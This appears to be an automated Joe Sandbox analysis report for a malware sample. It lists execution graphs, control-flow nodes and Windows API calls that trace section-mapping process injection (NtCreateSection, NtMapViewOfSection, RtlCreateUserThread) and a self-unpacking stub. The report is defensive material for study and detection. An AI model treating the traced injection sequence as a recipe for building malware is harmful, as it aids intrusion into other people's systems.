                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B1F
                                                            • HeapDestroy.KERNEL32(00000000), ref: 00415B3E
                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B46
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                            • String ID:
                                                            • API String ID: 367530164-0
                                                            • Opcode ID: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
                                                            • Instruction ID: 9b1347604edf95c8b03cd5cfcdcf1f5faacd6efc657b722f8f0869e5d5630474
                                                            • Opcode Fuzzy Hash: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
                                                            • Instruction Fuzzy Hash: 4E01A270A86504DBE650EBA4ED85BDA7BB8F70C346F404037E60A97280DA746D54CB9A

                                                            Execution Graph

                                                            Execution Coverage:11.5%
                                                            Dynamic/Decrypted Code Coverage:16.5%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:170
                                                            Total number of Limit Nodes:9
                                                            execution_graph 3543 4019c0 3544 4019c8 3543->3544 3545 4019e7 3543->3545 3546 401a29 Sleep 3545->3546 3547 4014fb 7 API calls 3546->3547 3548 401a44 3547->3548 3549 4015fb 7 API calls 3548->3549 3550 401a55 3548->3550 3549->3550 3274 415c40 3277 415840 3274->3277 3276 415c45 3278 41584d 3277->3278 3279 415a30 3278->3279 3280 415907 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3278->3280 3281 415a40 SetCommState 3279->3281 3285 415a59 3279->3285 3282 41596d 7 API calls 3280->3282 3281->3279 3283 415a21 3282->3283 3284 415a1a PulseEvent 3282->3284 3283->3279 3284->3283 3286 415b26 3285->3286 3287 415a66 7 API calls 3285->3287 3298 415490 LocalAlloc 3286->3298 3294 415afa 3287->3294 3291 415b2b LoadLibraryA 3299 4154c0 GetModuleHandleW GetProcAddress VirtualProtect 3291->3299 3292 415b7d 3300 4157b0 3292->3300 3294->3286 3295 415b82 3296 415bb9 InterlockedDecrement 3295->3296 3297 415bcf 3295->3297 3296->3295 3297->3276 3298->3291 3299->3292 3301 4157d9 QueryDosDeviceW 3300->3301 3302 4157ea 3300->3302 3301->3302 3311 415650 3302->3311 3305 415805 3314 415690 3305->3314 3306 4157fd FreeEnvironmentStringsA 3306->3305 3309 41582c 3309->3295 3310 41581c HeapDestroy GetNumaHighestNodeNumber 3310->3309 3312 415661 FatalAppExitA GetModuleHandleW 3311->3312 3313 415673 3311->3313 3312->3313 3313->3305 3313->3306 3315 41569d 3314->3315 3316 4156c9 3315->3316 3317 4156b8 BuildCommDCBA 3315->3317 3318 4156d1 WritePrivateProfileStringA FreeEnvironmentStringsA 3316->3318 3319 4156f3 3316->3319 3317->3319 3318->3319 3321 415729 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3319->3321 3322 41577a 3319->3322 3323 415680 3319->3323 3321->3319 3322->3309 3322->3310 3326 415610 3323->3326 3327 415639 3326->3327 3328 41562c SetEvent 3326->3328 3327->3319 3328->3327 3487 402f42 3489 402f18 3487->3489 3488 4019e0 15 API calls 3490 40304f 3488->3490 3489->3488 3489->3490 3329 2bf003c 3330 2bf0049 3329->3330 3342 2bf0e0f SetErrorMode SetErrorMode 3330->3342 3335 2bf0265 3336 2bf02ce VirtualProtect 3335->3336 3338 2bf030b 3336->3338 3337 2bf0439 VirtualFree 3340 2bf04be LoadLibraryA 3337->3340 3338->3337 3341 2bf08c7 3340->3341 3343 2bf0223 3342->3343 3344 2bf0d90 3343->3344 3345 2bf0dad 3344->3345 3346 2bf0dbb GetPEB 3345->3346 3347 2bf0238 VirtualAlloc 3345->3347 3346->3347 3347->3335 3503 403103 3504 403246 3503->3504 3505 40312d 3503->3505 3505->3504 3506 4031f0 RtlCreateUserThread NtTerminateProcess 3505->3506 3506->3504 3421 401606 3421->3421 3422 401609 3421->3422 3423 4016af NtDuplicateObject 3422->3423 3432 4017cb 3422->3432 3424 4016cc NtCreateSection 3423->3424 3423->3432 3425 4016f2 NtMapViewOfSection 3424->3425 3426 40174c NtCreateSection 3424->3426 3425->3426 3428 401715 NtMapViewOfSection 3425->3428 3427 401778 3426->3427 3426->3432 3430 401782 NtMapViewOfSection 3427->3430 3427->3432 3428->3426 3429 401733 3428->3429 3429->3426 3431 4017a9 NtMapViewOfSection 3430->3431 3430->3432 3431->3432 3352 2c69fcc 3353 2c69fdb 3352->3353 3356 2c6a76c 3353->3356 3358 2c6a787 3356->3358 3357 2c6a790 CreateToolhelp32Snapshot 3357->3358 3359 2c6a7ac Module32First 3357->3359 3358->3357 3358->3359 3360 2c6a7bb 3359->3360 3362 2c69fe4 3359->3362 3363 2c6a42b 3360->3363 3364 2c6a456 3363->3364 3365 2c6a467 VirtualAlloc 3364->3365 3366 2c6a49f 3364->3366 3365->3366 3366->3366 3433 401613 3434 40161c 3433->3434 3435 4017cb 3434->3435 3436 4016af NtDuplicateObject 3434->3436 3436->3435 3437 4016cc NtCreateSection 3436->3437 3438 4016f2 NtMapViewOfSection 3437->3438 3439 40174c NtCreateSection 3437->3439 3438->3439 3441 401715 NtMapViewOfSection 3438->3441 3439->3435 3440 401778 3439->3440 3440->3435 3443 401782 NtMapViewOfSection 3440->3443 3441->3439 3442 401733 3441->3442 3442->3439 3443->3435 3444 4017a9 NtMapViewOfSection 3443->3444 3444->3435 3551 2bf092b GetPEB 3552 2bf0972 3551->3552 3348 403257 3349 4031f0 RtlCreateUserThread NtTerminateProcess 3348->3349 3351 403261 3348->3351 3350 403246 3349->3350 3351->3351 3471 402ed9 3473 402e8d 3471->3473 3472 4019e0 15 API calls 3474 40304f 3472->3474 3473->3471 3473->3472 3473->3474 3553 4019eb 3554 4019f0 3553->3554 3555 401a29 Sleep 3554->3555 3556 4014fb 7 API calls 3555->3556 3557 401a44 3556->3557 3558 4015fb 7 API calls 3557->3558 3559 401a55 3557->3559 3558->3559 3475 4014fa 3484 40150c 3475->3484 3476 4016af NtDuplicateObject 3477 4016cc NtCreateSection 3476->3477 3486 4015ea 3476->3486 3478 4016f2 NtMapViewOfSection 3477->3478 3479 40174c NtCreateSection 3477->3479 3478->3479 3481 401715 NtMapViewOfSection 3478->3481 3480 401778 3479->3480 3479->3486 3483 401782 NtMapViewOfSection 3480->3483 3480->3486 3481->3479 3482 401733 3481->3482 3482->3479 3485 4017a9 NtMapViewOfSection 3483->3485 3483->3486 3484->3476 3484->3486 3485->3486 3367 402fbe 3369 402fc3 3367->3369 3368 40304f 3369->3368 3371 4019e0 3369->3371 3372 4019e7 3371->3372 3373 401a29 Sleep 3372->3373 3378 4014fb 3373->3378 3375 401a44 3377 401a55 3375->3377 3390 4015fb 3375->3390 3377->3368 3387 40150c 3378->3387 3379 4016af NtDuplicateObject 3380 4016cc NtCreateSection 3379->3380 3389 4015ea 3379->3389 3381 4016f2 NtMapViewOfSection 3380->3381 3382 40174c NtCreateSection 3380->3382 3381->3382 3384 401715 NtMapViewOfSection 3381->3384 3383 401778 3382->3383 3382->3389 3386 401782 NtMapViewOfSection 3383->3386 3383->3389 3384->3382 3385 401733 3384->3385 3385->3382 3388 4017a9 NtMapViewOfSection 3386->3388 3386->3389 3387->3379 3387->3389 3388->3389 3389->3375 3391 40160b 3390->3391 3392 4016af NtDuplicateObject 3391->3392 3401 4017cb 3391->3401 3393 4016cc NtCreateSection 3392->3393 3392->3401 3394 4016f2 NtMapViewOfSection 3393->3394 3395 40174c NtCreateSection 3393->3395 3394->3395 3397 401715 NtMapViewOfSection 3394->3397 3396 401778 3395->3396 3395->3401 3399 401782 NtMapViewOfSection 3396->3399 3396->3401 3397->3395 3398 401733 3397->3398 3398->3395 3400 4017a9 NtMapViewOfSection 3399->3400 3399->3401 3400->3401 3401->3377

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 415840-415868 2 415870-415877 0->2 3 415879-41587b 2->3 4 41587f-415885 2->4 3->4 5 415887-415891 4->5 6 415896-4158a0 4->6 5->6 7 4158a2-4158ae 6->7 8 4158b8-4158bf 6->8 7->8 8->2 9 4158c1-4158c9 8->9 10 4158d0-4158d6 9->10 12 4158e4-4158eb 10->12 13 4158d8-4158de 10->13 14 4158f1-4158f8 12->14 15 4158ed 12->15 13->12 14->10 16 4158fa-415901 14->16 15->14 17 415a30-415a3e 16->17 18 415907-415a18 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415a40-415a4e SetCommState 17->19 22 415a21-415a2d 18->22 23 415a1a-415a1b PulseEvent 18->23 24 415a50-415a57 19->24 25 415a59-415a60 19->25 22->17 23->22 24->19 24->25 26 415b26-415b35 call 415490 25->26 27 415a66-415b20 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415b37-415b48 26->33 34 415b6d-415b78 LoadLibraryA call 4154c0 26->34 27->26 35 415b50-415b60 33->35 40 415b7d-415b8e call 4157b0 34->40 38 415b62 35->38 39 415b68-415b6b 35->39 38->39 39->34 39->35 45 415b90-415b97 40->45 46 415ba3-415ba9 45->46 47 415b99-415b9f 45->47 49 415bb0-415bb7 46->49 50 415bab call 4154b0 46->50 47->46 53 415bc6-415bcd 49->53 54 415bb9-415bc0 InterlockedDecrement 49->54 50->49 53->45 56 415bcf-415bdf 53->56 54->53 57 415be0-415bf0 56->57 58 415bf2 57->58 59 415bf9-415bfc 57->59 58->59 59->57 60 415bfe-415c09 59->60 61 415c10-415c15 60->61 62 415c17-415c1d 61->62 63 415c1f-415c25 61->63 62->63 64 415c27-415c34 62->64 63->61 63->64
                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415912
                                                            • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041592B
                                                            • FindAtomW.KERNEL32(00000000), ref: 00415932
                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041593A
                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415952
                                                            • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415979
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00415981
                                                            • GetVersionExW.KERNEL32(?), ref: 0041598E
                                                            • DisconnectNamedPipe.KERNEL32(?), ref: 004159A1
                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004159E6
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004159F5
                                                            • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415A0B
                                                            • PulseEvent.KERNEL32(00000000), ref: 00415A1B
                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415A44
                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415A75
                                                            • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415A86
                                                            • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415A8E
                                                            • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415ACE
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415AD5
                                                            • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415ADB
                                                            • GetBinaryType.KERNEL32(0041742C,?), ref: 00415AED
                                                            • LoadLibraryA.KERNELBASE(00417438), ref: 00415B72
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_40b000_565.jbxd
                                                            Similarity
                                                            • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                            • String ID: k`$}$
                                                            • API String ID: 2545807588-956986773
                                                            • Opcode ID: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
                                                            • Instruction ID: 1a4de0b24bdd0306310a4676e1e64ec04895e512500ce6235e9595c5278ae4d7
                                                            • Opcode Fuzzy Hash: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
                                                            • Instruction Fuzzy Hash: 3AA1F271802924EBC720EB65EC44ADF7B79FF89341F41406AF50AA7150DB385A81CFAD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 172 4015c6 170->172 173 40162f-401632 170->173 174 4015f6-4015f8 171->174 175 40157d-40159a 171->175 172->168 176 4015c8-4015cd 172->176 177 401634-401659 call 40127e 173->177 178 4016a5-4016a6 173->178 185 40159d 175->185 186 40152f-401530 175->186 180 401648-401659 176->180 181 4015cf-4015d0 176->181 187 40165b 177->187 188 40165e-401663 177->188 182 4016a7-4016a9 178->182 183 40162d 178->183 180->187 180->188 189 4015d2-4015e8 181->189 190 4015b6-4015b9 181->190 192 401987 182->192 193 4016af-4016c6 NtDuplicateObject 182->193 183->173 185->165 194 40159f-4015a1 185->194 186->158 187->188 212 401989-401991 188->212 213 401669-40167a 188->213 197 4015ea-4015f5 189->197 198 40157c 189->198 190->177 195 4015bb-4015c3 190->195 196 401996-4019dd call 40127e 192->196 193->192 199 4016cc-4016f0 NtCreateSection 193->199 201 4015a3 194->201 202 40161c 194->202 195->170 197->174 198->175 207 4015a9-4015b4 198->207 208 4016f2-401713 NtMapViewOfSection 199->208 209 40174c-401772 NtCreateSection 199->209 203 4015a5-4015a6 201->203 204 40161e-40162c 201->204 202->204 203->207 204->177 218 401643 204->218 207->190 208->209 216 401715-401731 NtMapViewOfSection 208->216 209->192 214 401778-40177c 209->214 212->188 212->196 213->192 226 401680-4016a3 213->226 214->192 219 401782-4017a3 NtMapViewOfSection 214->219 216->209 217 401733-401749 216->217 217->209 218->177 219->192 222 4017a9-4017c5 NtMapViewOfSection 219->222 222->192 227 4017cb call 4017d0 222->227 226->182
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                            • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 237 4015fb-401604 238 401615 237->238 239 40160b-401611 237->239 238->239 240 401618-40162c 238->240 239->240 244 401643 240->244 245 401634-401659 call 40127e 240->245 244->245 250 40165b 245->250 251 40165e-401663 245->251 250->251 253 401989-401991 251->253 254 401669-40167a 251->254 253->251 259 401996-4019dd call 40127e 253->259 257 401680-4016a9 254->257 258 401987 254->258 257->258 266 4016af-4016c6 NtDuplicateObject 257->266 258->259 266->258 268 4016cc-4016f0 NtCreateSection 266->268 270 4016f2-401713 NtMapViewOfSection 268->270 271 40174c-401772 NtCreateSection 268->271 270->271 275 401715-401731 NtMapViewOfSection 270->275 271->258 274 401778-40177c 271->274 274->258 278 401782-4017a3 NtMapViewOfSection 274->278 275->271 277 401733-401749 275->277 277->271 278->258 280 4017a9-4017c5 NtMapViewOfSection 278->280 280->258 283 4017cb call 4017d0 280->283
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 285 401613-40162c 289 401643 285->289 290 401634-401659 call 40127e 285->290 289->290 295 40165b 290->295 296 40165e-401663 290->296 295->296 298 401989-401991 296->298 299 401669-40167a 296->299 298->296 304 401996-4019dd call 40127e 298->304 302 401680-4016a9 299->302 303 401987 299->303 302->303 311 4016af-4016c6 NtDuplicateObject 302->311 303->304 311->303 313 4016cc-4016f0 NtCreateSection 311->313 315 4016f2-401713 NtMapViewOfSection 313->315 316 40174c-401772 NtCreateSection 313->316 315->316 320 401715-401731 NtMapViewOfSection 315->320 316->303 319 401778-40177c 316->319 319->303 323 401782-4017a3 NtMapViewOfSection 319->323 320->316 322 401733-401749 320->322 322->316 323->303 325 4017a9-4017c5 NtMapViewOfSection 323->325 325->303 328 4017cb call 4017d0 325->328
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 330 401606-401607 330->330 331 401609 330->331 332 40160b-40162c 331->332 333 40163c-401659 call 40127e 331->333 343 401643 332->343 344 401634-401639 332->344 340 40165b 333->340 341 40165e-401663 333->341 340->341 346 401989-401991 341->346 347 401669-40167a 341->347 343->344 344->333 346->341 352 401996-4019dd call 40127e 346->352 350 401680-4016a9 347->350 351 401987 347->351 350->351 359 4016af-4016c6 NtDuplicateObject 350->359 351->352 359->351 361 4016cc-4016f0 NtCreateSection 359->361 363 4016f2-401713 NtMapViewOfSection 361->363 364 40174c-401772 NtCreateSection 361->364 363->364 368 401715-401731 NtMapViewOfSection 363->368 364->351 367 401778-40177c 364->367 367->351 371 401782-4017a3 NtMapViewOfSection 367->371 368->364 370 401733-401749 368->370 370->364 371->351 373 4017a9-4017c5 NtMapViewOfSection 371->373 373->351 376 4017cb call 4017d0 373->376
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 378 401627-40162c 382 401643 378->382 383 401634-401659 call 40127e 378->383 382->383 388 40165b 383->388 389 40165e-401663 383->389 388->389 391 401989-401991 389->391 392 401669-40167a 389->392 391->389 397 401996-4019dd call 40127e 391->397 395 401680-4016a9 392->395 396 401987 392->396 395->396 404 4016af-4016c6 NtDuplicateObject 395->404 396->397 404->396 406 4016cc-4016f0 NtCreateSection 404->406 408 4016f2-401713 NtMapViewOfSection 406->408 409 40174c-401772 NtCreateSection 406->409 408->409 413 401715-401731 NtMapViewOfSection 408->413 409->396 412 401778-40177c 409->412 412->396 416 401782-4017a3 NtMapViewOfSection 412->416 413->409 415 401733-401749 413->415 415->409 416->396 418 4017a9-4017c5 NtMapViewOfSection 416->418 418->396 421 4017cb call 4017d0 418->421
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                            • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 423 401641-401659 call 40127e 430 40165b 423->430 431 40165e-401663 423->431 430->431 433 401989-401991 431->433 434 401669-40167a 431->434 433->431 439 401996-4019dd call 40127e 433->439 437 401680-4016a9 434->437 438 401987 434->438 437->438 446 4016af-4016c6 NtDuplicateObject 437->446 438->439 446->438 448 4016cc-4016f0 NtCreateSection 446->448 450 4016f2-401713 NtMapViewOfSection 448->450 451 40174c-401772 NtCreateSection 448->451 450->451 455 401715-401731 NtMapViewOfSection 450->455 451->438 454 401778-40177c 451->454 454->438 458 401782-4017a3 NtMapViewOfSection 454->458 455->451 457 401733-401749 455->457 457->451 458->438 460 4017a9-4017c5 NtMapViewOfSection 458->460 460->438 463 4017cb call 4017d0 460->463
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 466 403103-403127 467 403246-40324b 466->467 468 40312d-403145 466->468 468->467 469 40314b-40315c 468->469 470 40315e-403167 469->470 471 40316c-40317a 470->471 471->471 472 40317c-403183 471->472 473 4031a5-4031ac 472->473 474 403185-4031a4 472->474 475 4031ce-4031d1 473->475 476 4031ae-4031cd 473->476 474->473 477 4031d3-4031d6 475->477 478 4031da 475->478 476->475 477->478 479 4031d8 477->479 478->470 480 4031dc-4031e1 478->480 479->480 480->467 481 4031e3-4031e6 480->481 481->467 482 4031e8-403243 RtlCreateUserThread NtTerminateProcess 481->482 482->467
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
